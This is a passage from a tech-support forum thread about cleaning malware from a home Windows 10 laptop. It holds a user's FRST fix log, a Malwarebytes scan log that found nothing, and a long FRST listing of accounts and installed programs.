"C:\Users\Lexi\Documents\BusinessCardShell - back.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - back.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell - back.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell - back.png" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - back.png" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell - back.png => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\feather.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\feather.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\feather.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\Guethler woordle.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\Guethler woordle.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\Guethler woordle.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\Guethler.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\Guethler.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\Guethler.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
 
=========  ipconfig /flushdns =========
 

Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 

=========  ipconfig /flushdns =========
 

Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 7.8 GB temporary data Removed.
 

The system needed a reboot.
 
==== End of Fixlog 10:12:12 ====

Link to post
Share on other sites

Ran Malwarebytes.  Start Menu/cortana/powershell  will not load again. The log does not appear to be accurate as it found around 117 things and moved them to the quarantene.  They currently await in quarantine.   I reran FRST as it seemed to give data on the status of windows systems and am attaching those logs.   Let me know if you want me to proceed with the other scans.

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 1:02 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.09.05
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 418314
Time Elapsed: 41 min, 1 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Link to post
Share on other sites

Also it says in the log above rootkits were disabled and I specifically checked that box as indicated in the instructions.  I just checked and can see that it is still checked but I am not able to paste a screen shot.   

 

New Addition.txt below:

==================== Accounts: =============================

Administrator (S-1-5-21-2574262253-2623044021-4024016403-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2574262253-2623044021-4024016403-503 - Limited - Disabled)
Guest (S-1-5-21-2574262253-2623044021-4024016403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2574262253-2623044021-4024016403-1002 - Limited - Enabled)
Lexi (S-1-5-21-2574262253-2623044021-4024016403-1001 - Administrator - Enabled) => C:\Users\Lexi

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader for ScanSnap 4.1 (HKLM-x32\...\{FB400000-0002-0000-0000-074957833700}) (Version: 8.02.380.7259 - ABBYY)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 18.0.0.144 - Adobe Systems Incorporated)
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.14) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.14 - Adobe Systems Incorporated)
Amazon Cloud Drive (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\23ab716f18849b6f) (Version: 2.1.2013.1340 - Amazon)
Amazon Kindle (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Amazon Kindle) (Version:  - Amazon)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 2.2.0.153 - Amazon.com)
Amazon Unbox Video (x32 Version: 2.2.0.153 - Amazon.com) Hidden
Apple Application Support (HKLM-x32\...\{B3575D00-27EF-49C2-B9E0-14B3D954E992}) (Version: 1.5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Application X (HKLM-x32\...\Application X1.0) (Version:  - )
Audible Download Manager (HKLM-x32\...\AudibleDownloadManager) (Version: 6.6.0.12 - Audible, Inc.)
AudibleManager (HKLM-x32\...\AudibleManager) (Version: 1637796.2002539448.1402252320.32 - Audible, Inc.)
Avidemux 2.6 - 32 bits (32-bit) (HKLM-x32\...\Avidemux 2.6 - 32 bits) (Version: 2.6.9.00 - )
Bejeweled 2 Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
BodyMedia SYNC (HKLM-x32\...\InstallShield_{99567851-B7F1-4692-A33A-0732E761220B}) (Version: 2.3.0.98 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.3.0.98 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
Brother MFL-Pro Suite MFC-685CW (HKLM-x32\...\{A3FEC306-FBFF-4B0D-95B9-F9C67C65079E}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
CardMinder (HKLM-x32\...\{D4F2AFD3-0167-4464-B92F-78AB6DA8A0AA}) (Version: V4.1L10 - PFU)
CardMinder V4.1 (x32 Version: 4.1.10.1 - PFU) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Codecs for Windows 7 Pack 4.0.5 (HKLM-x32\...\Codecs for Windows 7 Pack) (Version: 4.0.5 - Codecs for Windows 7 Pack)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.3) (Version: 5.0.0.3 - Coupons.com Incorporated)
Cozi • FlyLady Edition (HKLM-x32\...\{6A40DDB9-D7B7-4C7E-9951-E3E8DE8A6B27}) (Version: 1.0.6029.37342 - Cozi Group, Inc.)
Craft ROBO Controller (HKLM-x32\...\{97D52BC9-D904-413F-A0F7-E3EE4C95B623}) (Version: 5.01 - Graphtec)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DLL Opener (HKLM-x32\...\DLL Opener) (Version: 0.1 - )
Duplicate Cleaner 2.0.6 (HKLM-x32\...\Duplicate Cleaner) (Version: 2.0.6 - DigitalVolcano)
Easy Thumbnails (Remove only) (HKLM-x32\...\Easy Thumbnails_is1) (Version: 3.0 - Fookes Software)
eDoc Organizer (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\fe1b84459eb7239d) (Version: 3.5.2.0 - eDoc LLC)
Escape Rosecliff Island (x32 Version: 2.2.0.82 - WildTangent) Hidden
Evernote v. 5.9.6 (HKLM-x32\...\{A542D366-9877-11E5-B101-005056951CAD}) (Version: 5.9.6.9494 - Evernote Corp.)
Family Tree Maker 2012 (HKLM-x32\...\Family Tree Maker 2012) (Version: 21.0.388 - Ancestry.com, Inc.)
Family Tree Maker 2012 (x32 Version: 21.0.388 - Ancestry.com, Inc.) Hidden
FATE - The Traitor Soul (x32 Version: 2.2.0.82 - WildTangent) Hidden
FileThis Fetch (HKLM-x32\...\{C087314D-EBFD-45B4-8073-A2D6592A4EE2}) (Version: 1.1.22 - FileThis)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 5.4.5.124 - Foxit Corporation)
Free AVI MPEG WMV MP4 FLV Video Joiner 8.7.1 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Garmin POI Loader (HKLM-x32\...\{4AF7F4F9-AEFE-4183-B333-BEDDD193339A}) (Version: 2.7.1 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Gears (HKLM-x32\...\{2FA41EBB-3F5A-35C3-85D6-51EC72A11FBD}) (Version: 0.5.3600 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.9.8 (HKLM-x32\...\HandBrake) (Version: 0.9.8 - )
Helium (HKLM-x32\...\{9A781940-AC41-4D5E-8E1E-76A04B916FB9}) (Version: 1.0.0 - ClockworkMod)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel® Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.7.1002 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{997C9EC4-B53D-479D-81B7-0AEC8D174BA1}) (Version: 10.4.1.10 - Apple Inc.)
Java 7 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417025FF}) (Version: 7.0.250 - Oracle)
Java 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.82 - WildTangent) Hidden
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.44.1 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyboarding Without Tears (HKLM-x32\...\Keyboarding-Without-Tears) (Version: 1.0 - UNKNOWN)
Keyboarding Without Tears (x32 Version: 1.0 - UNKNOWN) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
LeapFrog Connect (HKLM-x32\...\UPCShell) (Version: 6.0.19.19317 - LeapFrog)
LeapFrog Connect (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Leapster Explorer Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog My Pals Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog MyOwnStoryTimePad Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Junior Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LG Verizon United Drivers (HKLM-x32\...\{885DBC42-4BCC-4A7E-9F2B-64B25E02E926}) (Version: 2.6.0 - LG Electronics)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Picture It! Photo Premium 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OverDrive Media Console (HKLM-x32\...\{D07205E7-F6D3-4333-AFCC-782A07685B72}) (Version: 3.2.20 - OverDrive, Inc.)
Penguins! (x32 Version: 2.2.0.82 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.82 - WildTangent) Hidden
Quick Web Player (HKLM-x32\...\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1) (Version:  - )
QuickTime (HKLM-x32\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.20.503.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7572 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0013 - REALTEK Semiconductor Corp.)
ROBO Master (HKLM-x32\...\{44E8FA6E-931D-4755-82DA-DB93CE1F238C}) (Version: 5.10.0 - Graphtec)
ScanSnap (x32 Version: 5.1.11.1 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V4.1L11 - PFU)
ScanSnap Organizer (x32 Version: 4.1.11.18 - PFU LIMITED) Hidden
Scholastic eReader Support Files (HKLM-x32\...\{0DBAE82C-E2D0-418E-8DA2-4D2F54CC1C58}) (Version: 1.1.4246 - Scholastic)
Screen Recorder Launcher (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\ScreenRecorderLauncher) (Version: 2.0 - )
Secure Online Account Numbers (HKLM-x32\...\{65980EBF-C4B5-4555-823A-94DB7F709E53}) (Version: 2.3.14.0 - Discover)
Secure Online Account Numbers (x32 Version: 2.0.2.0 - Discover) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop'NCook Menu version 4.0.14 (HKLM-x32\...\{7B2A623E-AF79-4C51-9843-62C0C5D45F74}_is1) (Version: 4.0.14 - Rufenacht Innovative)
Shop'NCook Reader version 4.0.16 (HKLM-x32\...\{4F741F80-FCCF-4D9D-AADF-EF010DBABD49}_is1) (Version: 4.0.16 - Rufenacht Innovative)
SimpleOCR 3.1 (HKLM-x32\...\SimpleOCR 3.1) (Version:  - )
Skitch (HKLM-x32\...\Skitch 2.3.0.10) (Version: 2.3.0.10 - Evernote Corp.)
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype Toolbars (HKLM-x32\...\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}) (Version: 5.0.4137 - Skype Technologies S.A.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Storia (HKLM-x32\...\{D74EB870-4745-467B-9430-DA53A604A456}) (Version: 1.1.4246 - Scholastic)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.1 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.11 - TOSHIBA CORPORATION)
TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{C14518AF-1A0F-4D39-8011-69BAA01CD380}) (Version: 1.6.07.64 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.2.12-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.2.11.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.6C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.26C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.4 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.6 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.3.198 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{983CD6FE-8320-4B80-A8F6-0D0366E0AA22}) (Version: 1.0.80.3.64 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.38 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.6.0.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.3 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 for x64 - TOSHIBA Corporation)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{A0E99122-25C1-4CA4-9063-499A2A814EB6}) (Version: 1.6.06.64 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.1.40 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.1.1 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.9C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.3.4.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
ToshibaRegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.4 - Toshiba)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Leapster Explorer Plugin) (HKLM-x32\...\LeapsterExplorerPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog My Pals Plugin) (HKLM-x32\...\MyPalsPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog MyOwnStoryTimePad Plugin) (HKLM-x32\...\MyOwnStoryTimePadPlugin) (Version: 6.0.19.19317 - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Junior Plugin) (HKLM-x32\...\TagJuniorPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Plugin) (HKLM-x32\...\TagPlugin) (Version: 6.0.19.19317 - LeapFrog)
Utility Common Driver (x32 Version: 1.0.52.1C - TOSHIBA) Hidden
Virtual Families (x32 Version: 2.2.0.82 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.82 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.80 - WildTangent)
WildTangent ORB Game Console (x32 Version:  - WildTangent) Hidden
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - LeapFrog (FlyUsb) USB  (11/05/2008 1.1.1.0) (HKLM\...\781745E87AFF80C0C1388CFF79D19ECAB2E9BB47) (Version: 11/05/2008 1.1.1.0 - LeapFrog)
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net  (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Zuma's Revenge (x32 Version: 2.2.0.82 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Lexi\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

